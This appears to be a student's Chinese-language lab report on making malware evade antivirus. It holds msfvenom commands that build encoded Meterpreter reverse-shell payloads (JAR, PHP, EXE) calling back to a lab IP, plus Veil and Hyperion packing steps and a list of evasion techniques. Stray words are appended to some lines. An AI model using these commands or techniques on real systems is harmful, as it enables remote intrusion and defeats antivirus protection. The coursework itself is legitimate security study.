1、正確使用msf編碼器,msfvenom生成如jar之類的其餘文件,veil-evasion,本身利用shellcode編程等免殺工具或技巧php
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 4305_backjar.jar
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.129 LPORT=6305 -f exe > met-encoded.exe
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.80.129 LPORT=6305 -f exe > msf4305.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.80.129 LPORT=4305 x> 20164305.php
1 sudo apt-get install veil 2 sudo apt-get upgrade veil
使用veilhtml
1 /usr/share/windows-binaries/hyperion/ 2 wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe
因爲懶惰,作本次試驗拖了幾天,看到不少同窗都達到了實驗報告中免殺的要求,因而我就按部分同窗的製做思路,復現了一下,發現沒有成功,具體狀況以下java
實驗感想shell
無論是經過什麼方法,只要用加密殼就必定被殺,只要用反彈鏈接就會生成meterpreter文件也會被殺,因此只是改變編碼順序並不能避免被殺,真心但願前面作出來的同窗教我一下如何被免殺。編程
殺軟是如何檢測出惡意代碼的?windows
- 基於特徵碼
- 實時監控
- 基於行爲的惡意軟件檢測
免殺是作什麼?tcp
能夠實現殺毒軟件不發現、掃描不出病毒代碼。工具
免殺的基本方法有哪些網站
- 改變特徵碼
- 加殼
- shellcode+encoder
- veil-evasion
- 半手工化
- 改變行爲
- 通信方式
- 儘可能使用反彈式鏈接
- 使用隧道技術
- 加密通信數據
- 操做系統
- 基於內存操做
- 減小對系統的修改
- 加入混淆做用的正常功能代碼
開啓殺軟能絕對防止電腦中惡意代碼嗎ui
那必定是防不住的,殺毒軟件是被動的防禦方式,只有惡意代碼的更新纔會促進殺軟的升級